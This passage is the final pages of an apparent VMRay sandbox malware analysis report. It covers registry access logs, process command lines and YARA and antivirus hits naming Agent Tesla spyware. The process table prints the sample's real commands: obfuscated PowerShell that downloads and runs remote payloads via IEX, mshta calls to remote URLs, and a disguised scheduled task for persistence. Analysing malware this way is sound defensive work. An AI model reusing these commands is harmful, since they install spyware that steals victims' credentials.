access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR
access mshta.exe CLEAN
X-Ray Vision for Malware - www.vmray.com 52 / 60
DYNAMIC ANALYSIS REPORT#2111629
Registry Key Operations Parent Process Name Verdict
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
access, read mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\PageSetup
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\PageSetup\Print_Background
access, read mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_XSSFILTER
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_XSSFILTER
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
access mshta.exe CLEAN
X-Ray Vision for Malware - www.vmray.com 53 / 60
DYNAMIC ANALYSIS REPORT#2111629
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_Cross_Domain_Redirect_Mitigation
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_Cross_Domain_Redirect_Mitigation
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsScript\Features
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\COM+Enabled access, read mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_Isolate_Named_Windows
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_Isolate_Named_Windows
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting access aspnet_compiler.exe, mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting\Default Impersonation Level
access, read aspnet_compiler.exe, mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ
access mshta.exe CLEAN
X-Ray Vision for Malware - www.vmray.com 54 / 60
DYNAMIC ANALYSIS REPORT#2111629
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LOAD_SHDOCLC_RESOURCES
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_LOAD_SHDOCLC_RESOURCES
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_IMG
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_IMG
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BINARY_CALLER_SERVICE_PROVIDER
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_BINARY_CALLER_SERVICE_PROVIDER
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DISABLE_BEHAVIORS_DRAW_REENTRANCY
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_DISABLE_BEHAVIORS_DRAW_REENTRANCY
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP
access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SKIP_LEAK_CLEANUP_AT_SHUTDOWN_KB835183
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\FeatureControl\FEATURE_SKIP_LEAK_CLEANUP_AT_SHUTDOWN_KB835183
access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
access powershell.exe CLEAN
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment\__PSLockdownPolicy
access, read powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\InstallationType
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319
access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\HWRPortReuseOnSocketBind
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseHttpPipeliningAndBufferPooling
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseSafeSynchronousClose
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseSafeSynchronousClose
access, read aspnet_compiler.exe, powershell.exe CLEAN
X-Ray Vision for Malware - www.vmray.com 55 / 60
DYNAMIC ANALYSIS REPORT#2111629
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictRfcInterimResponseHandling
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowDangerousUnicodeDecompositions
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowDangerousUnicodeDecompositions
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.UseStrictIPv6AddressParsing
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictIPv6AddressParsing
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine
access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine\ApplicationBase
access, read powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowAllUriEncodingExpansion
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowAllUriEncodingExpansion
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchUseStrongCrypto
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.SchSendAuxRecord
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchSendAuxRecord
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SystemDefaultTlsVersions
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.RequireCertificateEKUs
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\RequireCertificateEKUs
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_PERFORMANCE_DATA access powershell.exe CLEAN
HKEY_CURRENT_USER access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\LegacyWPADSupport
access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging
access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext
access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework access aspnet_compiler.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgJITDebugLaunchSetting
access, read aspnet_compiler.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgManagedDebugger
access, read aspnet_compiler.exe CLEAN
X-Ray Vision for Malware - www.vmray.com 56 / 60
DYNAMIC ANALYSIS REPORT#2111629
Registry Key Operations Parent Process Name Verdict
Reduced dataset
Process
Process Name Commandline Verdict
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings
access, create wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings
access, create wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\IgnoreUserSettings
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\Enabled
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\Enabled
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\LogSecuritySuccesses
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\LogSecuritySuccesses
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\TrustPolicy
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\UseWINSAFER
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\TrustPolicy
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\UseWINSAFER
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\Timeout
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\DisplayLogo
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\Timeout
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\DisplayLogo
access, read wscript.exe CLEAN
HKEY_CLASSES_ROOT\.vbs access, read wscript.exe CLEAN
HKEY_CLASSES_ROOT\VBSFile\ScriptEngine access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting\Default Namespace
access, read aspnet_compiler.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\WMIDisableCOMSecurity
access, read aspnet_compiler.exe CLEAN
mshta.exe C:\Windows\SysWOW64\mshta.exe https://www.bitly.com/ddwddwwkfwdwoooi SUSPICIOUS
powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /create /sc MINUTE /mo 80 /tn ""BlueStacksIUptad"" /F /tr ""\""MsHtA http://1230948%[email protected]/p/9.html\""
SUSPICIOUS
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hI`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Cre... ...-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt').GetResponse().GetResponseStream()).ReadToend());
SUSPICIOUS
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING ='(N`e`<^_^>t`.W`e'.Replace('<^_^>','w-Object Ne');$alosh='b... ...9a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
SUSPICIOUS
schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 80 /tn BlueStacksIUptad /F /tr"MsHtA http://1230948%[email protected]/p/9.html"
SUSPICIOUS
mshta.exe C:\Windows\system32\MsHtA.EXE http://1230948%[email protected]/p/9.html SUSPICIOUS
aspnet_compiler.exe #cmd SUSPICIOUS
X-Ray Vision for Malware - www.vmray.com 57 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process Name Commandline Verdict
powerpnt.exe "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" CLEAN
outlook.exe "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding CLEAN
svchost.exe C:\Windows\system32\svchost.exe -k netsvcs CLEAN
wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding CLEAN
taskeng.exetaskeng.exe {4AF814F3-B5F2-456B-9FF3-B4FF2E8485C0}S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\kEecfMwgj:Interactive:LUA[1]
CLEAN
aspnet_compiler.exe #Powershell CLEAN
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Chrome.vbs" CLEAN
powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicyUnrestricted -File C:\Users\Public\run.ps1
CLEAN
schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I CLEAN
powershell.exe powershell.exe ((gp HKCU:\Software).cookerr)|IEX CLEAN
wscript.exe"C:\Windows\System32\WScript.exe" "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\OneDrive.vbs"
CLEAN
powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicyUnrestricted -File C:\Users\Public\msi.ps1
CLEAN
X-Ray Vision for Malware - www.vmray.com 58 / 60
DYNAMIC ANALYSIS REPORT#2111629
YARA / AV
YARA (1)
Ruleset Name Rule Name Rule Description File Type File Name Classification Verdict
Antivirus (1)
File Type Threat Name File Name Verdict
MalwareAgentTesla_StringDecryption_v3
Agent Tesla v3 string decryption Memory Dump - Spyware 5/5
Downloaded File VB:Trojan.Valyria.4205 - MALICIOUS
X-Ray Vision for Malware - www.vmray.com 59 / 60
DYNAMIC ANALYSIS REPORT#2111629
ENVIRONMENT
Virtual Machine Information
Analyzer Information
Software Information
Name win7_64_sp1_en_mso2016
Description win7_64_sp1_en_mso2016
Architecture x86 64-bit
Operating System Windows 7
Kernel Version 6.1.7601.18741 (2e37f962-d699-492c-aaf3-f9f4e9770b1d)
Network Scheme Name Local Gateway
Network Config Name Local Gateway
Analyzer Version 4.2.2
Dynamic Engine Version 4.2.2 / 07/23/2021 03:44
Static Engine Version 4.2.2.0
Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (March 15, 2021)
Built-in AV Database Update ReleaseDate
2021-08-09 09:51:18+00:00
AV Exceptions Version 4.2.2.54 / 2021-07-23 03:00:10
VTI Ruleset Version 4.2.2.31 / 2021-07-19 18:52:40
YARA Built-in Ruleset Version 4.2.2.32
Link Detonation Heuristics Version -
Signature Trust Store Version 4.2.2.54 / 2021-07-23 03:00:10
Analysis Report Layout Version 10
Adobe Acrobat Reader Version Not installed
Microsoft Office 2016
Microsoft Office Version 16.0.4266.1003
Internet Explorer Version 8.0.7601.17514
Chrome Version Not installed
Firefox Version Not installed
Flash Version Not installed
Java Version Not installed
X-Ray Vision for Malware - www.vmray.com 60 / 60